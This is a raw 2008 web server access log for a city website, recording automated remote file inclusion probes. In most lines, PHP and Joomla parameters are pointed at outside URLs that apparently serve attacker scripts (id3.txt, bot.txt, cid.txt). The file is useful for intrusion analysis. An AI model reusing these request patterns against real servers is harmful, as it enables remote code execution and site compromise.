200.101.192.223 - - [30/Nov/2008:17:30:50 -0800] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.freeimagehosting.net/uploads/0f874de474.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "cityofarkadelphia.com"
207.44.134.23 - - [30/Nov/2008:17:31:13 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.moneytec.com/trader/request/bot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "cityofarkadelphia.com"
207.44.134.23 - - [30/Nov/2008:17:31:14 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.moneytec.com/trader/request/bot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "cityofarkadelphia.com"
64.15.131.162 - - [30/Nov/2008:17:34:07 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "cityofarkadelphia.com"
64.135.71.20 - - [30/Nov/2008:17:36:31 -0800] "GET /logs/access_081031.log/lostpasswd.php?env[include_prefix]=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
64.135.71.20 - - [30/Nov/2008:17:36:32 -0800] "GET /lostpasswd.php?env[include_prefix]=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
64.135.71.20 - - [30/Nov/2008:17:36:32 -0800] "GET /logs/lostpasswd.php?env[include_prefix]=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
64.15.131.162 - - [30/Nov/2008:17:36:53 -0800] "GET /logs/access_080731.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "cityofarkadelphia.com"
64.15.131.162 - - [30/Nov/2008:17:36:53 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "cityofarkadelphia.com"
64.15.131.162 - - [30/Nov/2008:17:36:54 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "cityofarkadelphia.com"
64.135.71.20 - - [30/Nov/2008:17:37:37 -0800] "GET /logs/access_081031.log/lostpasswd.php?env[include_prefix]=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
64.135.71.20 - - [30/Nov/2008:17:37:37 -0800] "GET /lostpasswd.php?env[include_prefix]=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
64.135.71.20 - - [30/Nov/2008:17:37:37 -0800] "GET /logs/lostpasswd.php?env[include_prefix]=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
124.0.208.252 - - [30/Nov/2008:17:40:03 -0800] "GET /logs/access_080329.log/modules/My_eGallery/index.php?basepath=http://geocities.com/shirohige_team/idv8.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
124.0.208.252 - - [30/Nov/2008:17:40:03 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://geocities.com/shirohige_team/idv8.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
124.0.208.252 - - [30/Nov/2008:17:40:03 -0800] "GET /modules/My_eGallery/index.php?basepath=http://geocities.com/shirohige_team/idv8.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
124.0.208.252 - - [30/Nov/2008:17:40:42 -0800] "GET /logs/access.log/modules/My_eGallery/index.php?basepath=http://geocities.com/shirohige_team/idv8.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
64.135.71.20 - - [30/Nov/2008:17:41:44 -0800] "GET /logs/access.log/lostpasswd.php?env[include_prefix]=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
64.135.71.20 - - [30/Nov/2008:17:42:35 -0800] "GET /modules/My_eGallery/index.php?basepath=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
64.135.71.20 - - [30/Nov/2008:17:42:35 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
64.135.71.20 - - [30/Nov/2008:17:42:36 -0800] "GET /logs/access_080329.log/modules/My_eGallery/index.php?basepath=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
64.135.71.20 - - [30/Nov/2008:17:43:24 -0800] "GET /logs/access.log/modules/My_eGallery/index.php?basepath=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
64.135.71.20 - - [30/Nov/2008:17:43:37 -0800] "GET /logs/access_080329.log/modules/My_eGallery/index.php?basepath=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
64.135.71.20 - - [30/Nov/2008:17:43:37 -0800] "GET /modules/My_eGallery/index.php?basepath=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
64.135.71.20 - - [30/Nov/2008:17:43:37 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
64.135.71.20 - - [30/Nov/2008:17:44:09 -0800] "GET /logs/access.log/lostpasswd.php?env[include_prefix]=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
64.135.71.20 - - [30/Nov/2008:17:44:28 -0800] "GET /logs/access.log/modules/My_eGallery/index.php?basepath=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
64.15.131.162 - - [30/Nov/2008:17:44:44 -0800] "GET /logs/access.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "cityofarkadelphia.com"
216.12.200.23 - - [30/Nov/2008:17:45:37 -0800] "GET /logs/access_080329.log/modules/My_eGallery/index.php?basepath=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
216.12.200.23 - - [30/Nov/2008:17:45:38 -0800] "GET /modules/My_eGallery/index.php?basepath=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
216.12.200.23 - - [30/Nov/2008:17:45:38 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
216.12.200.23 - - [30/Nov/2008:17:46:51 -0800] "GET /logs/access.log/modules/My_eGallery/index.php?basepath=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
67.15.54.41 - - [30/Nov/2008:17:51:42 -0800] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.zhepb.gov.cn/idfeel.txt?%0D? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "cityofarkadelphia.com"
67.15.54.41 - - [30/Nov/2008:17:51:42 -0800] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.zhepb.gov.cn/idfeel.txt?%0D? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "cityofarkadelphia.com"
67.15.54.41 - - [30/Nov/2008:17:51:42 -0800] "GET /logs/access_080329.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.zhepb.gov.cn/idfeel.txt?%0D? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "cityofarkadelphia.com"
67.15.54.41 - - [30/Nov/2008:17:53:23 -0800] "GET /logs/access_080201.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.zhepb.gov.cn/idfeel.txt?%0D? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "cityofarkadelphia.com"
94.23.0.108 - - [30/Nov/2008:17:54:46 -0800] "GET /logs/access_080401.log%20%20/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://thatfhatass.com/HOWTOFRENCHKISS101/images/wpThumbnails/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
94.23.0.108 - - [30/Nov/2008:17:54:46 -0800] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://thatfhatass.com/HOWTOFRENCHKISS101/images/wpThumbnails/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
94.23.0.108 - - [30/Nov/2008:17:54:48 -0800] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://thatfhatass.com/HOWTOFRENCHKISS101/images/wpThumbnails/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
94.23.0.108 - - [30/Nov/2008:17:54:48 -0800] "GET /logs/access_080401.log%20%20/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://thatfhatass.com/HOWTOFRENCHKISS101/images/wpThumbnails/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
89.17.201.149 - - [30/Nov/2008:17:54:59 -0800] "GET /lostpasswd.php?env[include_prefix]=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
218.239.45.154 - - [30/Nov/2008:17:56:00 -0800] "GET /logs/access_080401.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://thatfhatass.com/HOWTOFRENCHKISS101/images/wpThumbnails/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.239.45.154 - - [30/Nov/2008:17:56:00 -0800] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://thatfhatass.com/HOWTOFRENCHKISS101/images/wpThumbnails/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
201.3.132.147 - - [30/Nov/2008:17:56:22 -0800] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://usuarios.lycos.es/zxczxc/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "cityofarkadelphia.com"
201.3.132.147 - - [30/Nov/2008:17:56:22 -0800] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://usuarios.lycos.es/zxczxc/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "cityofarkadelphia.com"
201.3.132.147 - - [30/Nov/2008:17:56:22 -0800] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://usuarios.lycos.es/zxczxc/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "cityofarkadelphia.com"
94.23.0.108 - - [30/Nov/2008:17:56:33 -0800] "GET /logs/access_080201.log%20%20/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://thatfhatass.com/HOWTOFRENCHKISS101/images/wpThumbnails/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
94.23.0.108 - - [30/Nov/2008:17:56:38 -0800] "GET /logs/access_080201.log%20%20/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://thatfhatass.com/HOWTOFRENCHKISS101/images/wpThumbnails/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
125.244.186.2 - - [30/Nov/2008:17:57:06 -0800] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
125.244.186.2 - - [30/Nov/2008:17:57:06 -0800] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
125.244.186.2 - - [30/Nov/2008:17:57:06 -0800] "GET /logs/access_080329.log%20//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
218.239.45.154 - - [30/Nov/2008:17:57:08 -0800] "GET /logs/access_080401.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://thatfhatass.com/HOWTOFRENCHKISS101/images/wpThumbnails/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.239.45.154 - - [30/Nov/2008:17:57:08 -0800] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://thatfhatass.com/HOWTOFRENCHKISS101/images/wpThumbnails/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
94.23.0.108 - - [30/Nov/2008:17:57:12 -0800] "GET /logs/access_080401.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://thatfhatass.com/HOWTOFRENCHKISS101/images/wpThumbnails/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
94.23.0.108 - - [30/Nov/2008:17:57:15 -0800] "GET /logs/access_080401.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://thatfhatass.com/HOWTOFRENCHKISS101/images/wpThumbnails/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.239.45.154 - - [30/Nov/2008:17:57:28 -0800] "GET /logs/access_080901.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://thatfhatass.com/HOWTOFRENCHKISS101/images/wpThumbnails/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
94.23.0.108 - - [30/Nov/2008:18:02:48 -0800] "GET /logs/access_080901.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://thatfhatass.com/HOWTOFRENCHKISS101/images/wpThumbnails/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.239.45.154 - - [30/Nov/2008:18:03:08 -0800] "GET /logs/access_080401.log%20%20/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://thatfhatass.com/HOWTOFRENCHKISS101/images/wpThumbnails/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.239.45.154 - - [30/Nov/2008:18:03:15 -0800] "GET /logs/access_080201.log%20%20/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://thatfhatass.com/HOWTOFRENCHKISS101/images/wpThumbnails/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
94.23.0.108 - - [30/Nov/2008:18:03:51 -0800] "GET /logs/access_080901.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://thatfhatass.com/HOWTOFRENCHKISS101/images/wpThumbnails/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.239.45.154 - - [30/Nov/2008:18:04:20 -0800] "GET /logs/access_080201.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://thatfhatass.com/HOWTOFRENCHKISS101/images/wpThumbnails/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
64.15.131.162 - - [30/Nov/2008:18:05:36 -0800] "GET /logs/access_080901.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "cityofarkadelphia.com"
94.23.0.108 - - [30/Nov/2008:18:06:02 -0800] "GET /logs/access_080201.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://thatfhatass.com/HOWTOFRENCHKISS101/images/wpThumbnails/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
94.23.0.108 - - [30/Nov/2008:18:06:06 -0800] "GET /logs/access_080201.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://thatfhatass.com/HOWTOFRENCHKISS101/images/wpThumbnails/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.239.45.154 - - [30/Nov/2008:18:07:19 -0800] "GET /logs/access_080901.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://thatfhatass.com/HOWTOFRENCHKISS101/images/wpThumbnails/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
66.40.52.25 - - [30/Nov/2008:18:07:53 -0800] "GET /administrator/components/com_jreactions/langset.php?comPath=http://www.geocities.com/rafaelrado/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "cityofarkadelphia.com"
66.40.52.25 - - [30/Nov/2008:18:07:53 -0800] "GET /logs/access_080330.log/administrator/components/com_jreactions/langset.php?comPath=http://www.geocities.com/rafaelrado/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "cityofarkadelphia.com"
66.40.52.25 - - [30/Nov/2008:18:07:53 -0800] "GET /logs/administrator/components/com_jreactions/langset.php?comPath=http://www.geocities.com/rafaelrado/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "cityofarkadelphia.com"
66.40.52.25 - - [30/Nov/2008:18:07:56 -0800] "GET /logs/access_080330.log/administrator/components/com_jreactions/langset.php?comPath=http://www.geocities.com/rafaelrado/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "cityofarkadelphia.com"
66.40.52.25 - - [30/Nov/2008:18:07:56 -0800] "GET /administrator/components/com_jreactions/langset.php?comPath=http://www.geocities.com/rafaelrado/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "cityofarkadelphia.com"
66.40.52.25 - - [30/Nov/2008:18:07:56 -0800] "GET /logs/administrator/components/com_jreactions/langset.php?comPath=http://www.geocities.com/rafaelrado/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "cityofarkadelphia.com"
218.239.45.154 - - [30/Nov/2008:18:08:42 -0800] "GET /logs/access_080401.log%20%20/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://thatfhatass.com/HOWTOFRENCHKISS101/images/wpThumbnails/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.239.45.154 - - [30/Nov/2008:18:08:48 -0800] "GET /logs/access_080201.log%20%20/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://thatfhatass.com/HOWTOFRENCHKISS101/images/wpThumbnails/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
89.17.201.149 - - [30/Nov/2008:18:09:08 -0800] "GET /logs/access_081031.log/lostpasswd.php?env[include_prefix]=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
201.80.215.232 - - [30/Nov/2008:18:09:08 -0800] "GET /logs/access.log/index.php?option=com_custompages&cpage=http://millionaire-secrets.bikaigroup.us/images/idbut.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
89.17.201.149 - - [30/Nov/2008:18:09:08 -0800] "GET /lostpasswd.php?env[include_prefix]=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
201.80.215.232 - - [30/Nov/2008:18:09:08 -0800] "GET /index.php?option=com_custompages&cpage=http://millionaire-secrets.bikaigroup.us/images/idbut.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
89.17.201.149 - - [30/Nov/2008:18:09:08 -0800] "GET /logs/lostpasswd.php?env[include_prefix]=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
201.80.215.232 - - [30/Nov/2008:18:09:09 -0800] "GET /logs/index.php?option=com_custompages&cpage=http://millionaire-secrets.bikaigroup.us/images/idbut.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
218.239.45.154 - - [30/Nov/2008:18:09:28 -0800] "GET /logs/access_080201.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://thatfhatass.com/HOWTOFRENCHKISS101/images/wpThumbnails/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
89.17.201.149 - - [30/Nov/2008:18:10:56 -0800] "GET /logs/access_080330.log/lostpasswd.php?env[include_prefix]=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
89.218.85.18 - - [30/Nov/2008:18:10:57 -0800] "GET /logs/access_080201.log//?path%5Bdocroot%5D=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
89.218.85.18 - - [30/Nov/2008:18:10:57 -0800] "GET /?path%5Bdocroot%5D=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 200 917 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
89.218.85.18 - - [30/Nov/2008:18:10:58 -0800] "GET /logs//?path%5Bdocroot%5D=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 200 4089 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
89.218.85.18 - - [30/Nov/2008:18:11:00 -0800] "GET /logs/access_080201.log//?path%5Bdocroot%5D=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
89.218.85.18 - - [30/Nov/2008:18:11:00 -0800] "GET /?path%5Bdocroot%5D=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 200 917 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
89.218.85.18 - - [30/Nov/2008:18:11:00 -0800] "GET /logs//?path%5Bdocroot%5D=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 200 4089 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
89.218.85.18 - - [30/Nov/2008:18:11:17 -0800] "GET /logs/access_080201.log//?path%5Bdocroot%5D=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
89.218.85.18 - - [30/Nov/2008:18:11:18 -0800] "GET /?path%5Bdocroot%5D=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 200 917 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
89.218.85.18 - - [30/Nov/2008:18:11:21 -0800] "GET /logs//?path%5Bdocroot%5D=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 200 4089 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
66.40.52.25 - - [30/Nov/2008:18:11:40 -0800] "GET /logs/access_081031.log/administrator/components/com_jreactions/langset.php?comPath=http://www.geocities.com/rafaelrado/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "cityofarkadelphia.com"
66.40.52.25 - - [30/Nov/2008:18:11:41 -0800] "GET /logs/access_081031.log/administrator/components/com_jreactions/langset.php?comPath=http://www.geocities.com/rafaelrado/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "cityofarkadelphia.com"
85.92.152.68 - - [30/Nov/2008:18:12:29 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://share-files.eu/tmp/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
85.92.152.68 - - [30/Nov/2008:18:12:30 -0800] "GET /skin/zero_vote/error.php?dir=http://share-files.eu/tmp/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
94.23.0.108 - - [30/Nov/2008:18:13:03 -0800] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://thatfhatass.com/HOWTOFRENCHKISS101/images/wpThumbnails/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
94.23.0.108 - - [30/Nov/2008:18:13:04 -0800] "GET /logs/access.log%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://thatfhatass.com/HOWTOFRENCHKISS101/images/wpThumbnails/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
94.23.0.108 - - [30/Nov/2008:18:13:04 -0800] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://thatfhatass.com/HOWTOFRENCHKISS101/images/wpThumbnails/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
94.23.0.108 - - [30/Nov/2008:18:13:05 -0800] "GET /logs/access.log%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://thatfhatass.com/HOWTOFRENCHKISS101/images/wpThumbnails/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
94.229.68.13 - - [30/Nov/2008:18:13:16 -0800] "GET /logs/access.log//errors.php?error=www.linarie.com/alat/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
94.229.68.13 - - [30/Nov/2008:18:13:17 -0800] "GET /errors.php?error=www.linarie.com/alat/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
